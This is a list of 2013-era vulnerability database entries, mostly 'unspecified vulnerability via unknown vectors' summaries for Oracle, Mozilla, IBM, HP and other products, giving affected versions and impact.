Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-5786.
Unspecified vulnerability in the Techstack component in Oracle E-Business Suite 12.1 allows remote attackers to affect confidentiality via unknown vectors related to Apache.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.4.0 and 8.4.1 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters.  NOTE: the previous information is from the October 2013 CPU. Oracle has not commented on claims from a third party that the issue is a stack-based buffer overflow in the Microsoft Access 1.x parser in vsacs.dll before 8.4.0.108 and before 8.4.1.52, which allows attackers to execute arbitrary code via a long field (aka column) name.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5787, CVE-2013-5824, CVE-2013-5832, and CVE-2013-5852.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-5789, CVE-2013-5824, CVE-2013-5832, and CVE-2013-5852.
Unspecified vulnerability in Oracle MySQL Server 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-5793.
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.6, 11.1.1.7, and 11.1.2.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security and Authentication.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Swing.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and earlier, 5.0u51 and earlier, and Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Java SE and JavaFX components in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-5775.
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE Java SE 7u40 and earlier, Java SE 6u60 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the Java SE and JavaFX components in Oracle Java SE 7u40 and earlier and JavaFX 2.2.40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-5777.
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, 6u60 and earlier, 5.0u51 and earlier, and Embedded 7u40 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Fusion Middleware 10.1.3.5.0 allows remote attackers to affect integrity via unknown vectors related to Servlet Runtime.
Unspecified vulnerability in the Java SE component in Oracle Java SE Java SE 7u40 and earlier and Java SE 6u60 and earlier allows remote attackers to affect integrity via unknown vectors related to jhat.
Unspecified vulnerability in the XML Parser component in Oracle Database Server 11.1.0.7, 11.2.0.2, 11.2.0.3, and 12.1.0.1 allows remote attackers to affect confidentiality and availability via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Locking.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 allows remote authenticated users to affect availability via unknown vectors related to Web Services.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect integrity via unknown vectors related to ActiveX Controls.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to DB Performance Advisories/UIs.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, and 12.1.0.1 allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.4.0 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Maintenance.  NOTE: the original disclosure of this issue erroneously mapped it to CVE-2013-3624.
Unspecified vulnerability in the Oracle Siebel CTMS component in Oracle Industry Applications 8.1.1.x allows local users to affect confidentiality and availability via unknown vectors related to SC-OC Integration.
Unspecified vulnerability in the Siebel Core - Server BizLogic Script component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Integration - Scripting.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 26.0 and SeaMonkey before 2.23 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 26.0, Firefox ESR 24.x before 24.2, Thunderbird before 24.2, and SeaMonkey before 2.23 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 25.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox before 25.0, Firefox ESR 24.x before 24.1, Thunderbird before 24.1, and SeaMonkey before 2.22 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in IBM Rational ClearCase through 7.1.2.12, 8.0.0.x before 8.0.0.9, and 8.0.1.x before 8.0.1.2 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability on the IBM WebSphere DataPower XC10 appliance 2.0 through 2.5.0.1 allows remote attackers to obtain administrative access via unknown vectors.
An unspecified servlet in IBM Platform Symphony Developer Edition (DE) 5.2 and 6.1.x through 6.1.1 has hardcoded credentials, which allows remote attackers to bypass authentication and obtain "local environment" access via unknown vectors.
Unspecified vulnerability in IBM SPSS Collaboration and Deployment Services 4.2.1 and 5.0 through FP2 allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2013-4042.
Sharetronix 3.1.1.3, 3.1.1, and earlier does not properly restrict access to unspecified AJAX functionality, which allows remote attackers to bypass authentication via unknown vectors.
Unspecified vulnerability in the Store Locator (locator) extension before 3.1.5 for TYPO3 has unknown impact and remote attack vectors, related to "Insecure Unserialize."
Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2, has unknown impact and attack vectors, a different vulnerability than CVE-2013-5031, CVE-2013-5032, and CVE-2013-5033.
Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2, has unknown impact and attack vectors, a different vulnerability than CVE-2013-5031, CVE-2013-5032, and CVE-2013-5034.
Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2, has unknown impact and attack vectors, a different vulnerability than CVE-2013-5031, CVE-2013-5033, and CVE-2013-5034.
Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2, has unknown impact and attack vectors, a different vulnerability than CVE-2013-5032, CVE-2013-5033, and CVE-2013-5034.
Unspecified vulnerability in the update and build database page in Sawmill before 8.6.3 allows remote attackers to have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in the TEQneers SEO Enhancements (tq_seo) extension before 5.0.1 for TYPO3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.3 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, 9.31, and 9.32, and ServiceCenter 6.2.8, allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Integrated Lights-Out 4 (iLO4) with firmware before 1.32 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in dbd_manager in LeftHand OS before 11.0 in HP StoreVirtual 4000 and StoreVirtual VSA Software (formerly LeftHand Virtual SAN Appliance) allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1509.
Unspecified vulnerability in HP and H3C VPN Firewall Module products SECPATH1000FE before 5.20.R3177 and SECBLADEFW before 5.20.R3177 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Virtual User Generator in HP LoadRunner before 11.52 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1851.
Unspecified vulnerability in Virtual User Generator in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1850.
Unspecified vulnerability in Virtual User Generator in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1832.
Unspecified vulnerability in the GossipService SOAP Request implementation in the Synchronizer component before 1.4.2 in HP Application LifeCycle Management (ALM) allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1759.
Unspecified vulnerability in the client component in HP Application LifeCycle Management (ALM) before 11 p11 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1327.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Service Operation Management Software Module allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-1647.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Service Operation Management Software Module allows remote attackers to bypass intended access restrictions via unknown vectors, aka ZDI-CAN-1645.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Service Operation Management Software Module allows remote attackers to bypass authentication via unknown vectors, aka ZDI-CAN-1644.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Branch Intelligent Management System Software Module (aka BIMS) allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-1607.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and HP IMC Branch Intelligent Management System Software Module (aka BIMS) allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1606.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall SSO Agent Option 8.0 through 10.0, IceWall SSO Smart Device Option 10.0, IceWall SSO SAML2 Agent Option 8.0, IceWall SSO JAVA Agent Library 8.0 through 10.0, IceWall Federation Agent 3.0, and IceWall File Manager 3.0 through SP4 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 10.0 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall SSO Agent Option 8.0 through 10.0, IceWall SSO Smart Device Option 10.0, and IceWall File Manager 3.0 through SP4 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 10.0 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, and 9.31 and Service Center 6.2.8 allows remote attackers to obtain privileged access via unknown vectors.
Unspecified vulnerability on the HP LaserJet Pro P1102w, P1606dn, M1212nf MFP, M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1218nfs MFP, and CP1025nw with firmware before 2013-07-26 20130703 allows remote attackers to modify data via unknown vectors.
Unspecified vulnerability in HP Integrated Lights-Out 3 (aka iLO3) firmware before 1.60 and 4 (aka iLO4) firmware before 1.30 allows remote attackers to bypass authentication via unknown vectors.
Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch 1 and 9.22 patch 1 allows remote attackers to execute arbitrary code and obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1736.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1735.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1734.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1705.
Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1690.
Unspecified vulnerability in Eucalyptus before 3.3.2 has unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b-p1, and possibly other versions, allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Hitachi JP1/IT Desktop Management - Manager 09-50 through 09-50-03, 09-51 through 09-51-05, 10-00 through 10-00-02, and 10-01 through 10-01-02; Hitachi Job Management Partner 1/IT Desktop Management - Manager 09-50 through 09-50-03 and 10-01; and Hitachi IT Operations Director 02-50 through 02-50-07, 03-00 through 03-00-12, and 04-00 through 04-00-01 allow remote authenticated users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in REDCap before 5.1.1 allow remote attackers to have an unknown impact via vectors involving (1) the Online Designer page or (2) the Manage Survey Participants page.
Unspecified vulnerability in the Data Search utility in data-entry forms in REDCap before 5.0.3 and 5.1.x before 5.1.2 has unknown impact and remote attack vectors.
Heap-based buffer overflow in the fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.9 for the Apache HTTP Server allows remote attackers to have an unspecified impact via unknown vectors.
WEB-DAV Linux File System (davfs2) 1.4.6 and 1.4.7 allow local users to gain privileges via unknown attack vectors in (1) kernel_interface.c and (2) mount_davfs.c, related to the "system" function.
Apache Struts 2.0.0 through 2.3.15.1 enables Dynamic Method Invocation by default, which has unknown impact and attack vectors.
Stack-based buffer overflow in OpenJPEG before 1.5.2 allows remote attackers to have unspecified impact via unknown vectors to (1) lib/openjp3d/opj_jp3d_compress.c, (2) bin/jp3d/convert.c, or (3) lib/openjp3d/event.c.
Multiple unspecified vulnerabilities in (1) dataitems.py, (2) get.py, and (3) traverseName.py in Plone 2.1 through 4.1, 4.2.x through 4.2.5, and 4.3.x through 4.3.1 allow remote authenticated users with administrator access to a subtree to access nodes above the subtree via unknown vectors.
Multiple unspecified vulnerabilities in Cryptocat Project Cryptocat 2.0.18 have unknown impact and attack vectors.
Cross-site request forgery (CSRF) vulnerability in webadmin.nsf in Domino Web Administrator in IBM Domino 8.5 and 9.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in IBM SPSS Collaboration and Deployment Services 4.2.1 and 5.0 through FP2 allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2013-5370.
IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager 5.x before 5.2, InfoSphere Optim Configuration Manager 2.x before 2.2, and DB2 Recovery Expert 2.x store unspecified authentication information in a cookie, which allows remote authenticated users to bypass intended access restrictions via unknown vectors.
IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, and 7.5 before 7.5.0.5 allows remote authenticated users to conduct unspecified file-inclusion attacks via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in IBM InfoSphere BigInsights 2.0 through 2.1 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Web Services.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in Oracle SPARC Enterprise T &amp; M Series Servers running Sun System Firmware before 6.7.13 for SPARC T1, 7.4.6.c for SPARC T2, 8.3.0.b for SPARC T3 &amp; T4, 9.0.0.d for SPARC T5 and 9.0.1.e for SPARC M5 allows local users to affect availability via unknown vectors related to Sun System Firmware/Hypervisor.
Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows remote attackers to affect availability via unknown vectors related to Cacao.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Integration Broker.
Unspecified vulnerability in the Oracle Secure Global Desktop component in Oracle Virtualization 5 allows remote attackers to affect availability via unknown vectors related to ttaauxserv.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5.0 and 11.1.2.0.0 allows remote attackers to affect integrity via unknown vectors related to Authentication Engine.
Unspecified vulnerability in the Siebel Server Remote component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect integrity via unknown vectors related to File System Management.
Unspecified vulnerability in the Oracle Portal component in Oracle Fusion Middleware 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Demos.
Unspecified vulnerability in the Hyperion Strategic Finance component in Oracle Hyperion 11.1.2.1 and 11.1.2.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server.
Unspecified vulnerability in the Java SE, Java SE Embedded component in Oracle Java SE Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Web Services component in Oracle Fusion Middleware 10.1.3.5.0 and 11.1.1.6.0 allows remote attackers to affect confidentiality via unknown vectors related to Test Page.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.2, 11.2.0.3, and 12.1.0.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Agile Product Collaboration component in Oracle Supply Chain Products Suite 9.3.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Folders &amp; Files Attachment.
Unspecified vulnerability in the Oracle Agile Collaboration Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote authenticated users to affect integrity via unknown vectors related to Manufacturing/Mfg Parts.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS).
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality and availability via unknown vectors related to Integration Broker.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect availability via unknown vectors related to Business Interlink.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality and availability via unknown vectors related to Mobile Applications.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect integrity via unknown vectors related to Portal, a different vulnerability than CVE-2013-2404.
Unspecified vulnerability in the Oracle Policy Automation component in Oracle Industry Applications 10.2.0, 10.3.0, 10.3.1, 10.4.0, 10.4.1, and 10.4.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Determinations Engine.
Unspecified vulnerability in the Oracle Retail Invoice Matching component in Oracle Industry Applications 10.2, 11.0, 12.0, 12.0IN, 12.1, 13.0, 13.1, and 13.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to System Administration.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the Hyperion BI+ component in Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Intelligence Service.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Business Interlinks.
Unspecified vulnerability in Oracle Solaris 10 and 11, when running on AMD64, allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
Unspecified vulnerability in Oracle Solaris 11 allows local users to affect availability via unknown vectors related to Filesystem/DevFS.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.18, 4.0.20, 4.1.28, and 4.2.18 allows local users to affect availability via unknown vectors related to Core.
Unspecified vulnerability in Enterprise Manager (EM) Base Platform 10.2.0.5 and EM DB Control 11.1.0.7 in Oracle Enterprise Manager Grid Control allows remote attackers to affect integrity via unknown vectors related to User Interface Framework.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect integrity via unknown vectors related to Privileged Account.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle iSupplier Portal component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Supplier Management.
Unspecified vulnerability in Oracle Solaris 10 and 11 allows remote attackers to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Career's Home.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors Time and Labor.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser.
Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization 4.6 prior to 4.63 and 4.7 prior to 4.71 allows remote attackers to affect integrity via unknown vectors related to Web UI.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7, 8.4.0, and 8.4.1 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2013-3776.
Unspecified vulnerability in the PeopleSoft Enterprise Portal component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Saved Search.
Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization All 4.6 releases including 4.63 and 4.7 prior to 4.71 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 12.0.6 and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Help.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Signon.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.7, 8.4.0, and 8.4.1 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2013-3781.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 5.2.1 and 6.0 allows remote attackers to affect integrity via unknown vectors related to Learner Pages.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3, and 12.1.0.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Web Forms.
Unspecified vulnerability in the Oracle executable component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-3760.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Content Server.  NOTE: the previous information is from the October 2013 CPU. Oracle has not commented on claims from a third party that the issue is related to "iDoc script injection" in the (1) cs and (2) urm components, which allows attackers to read "sensitive" files, as demonstrated by obtaining the "AES encryption key and encrypted credentials" of the weblogic user.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1, 11.1.1.6.0, and 11.1.1.7.0 allows remote attackers to affect integrity via unknown vectors related to Site Studio.
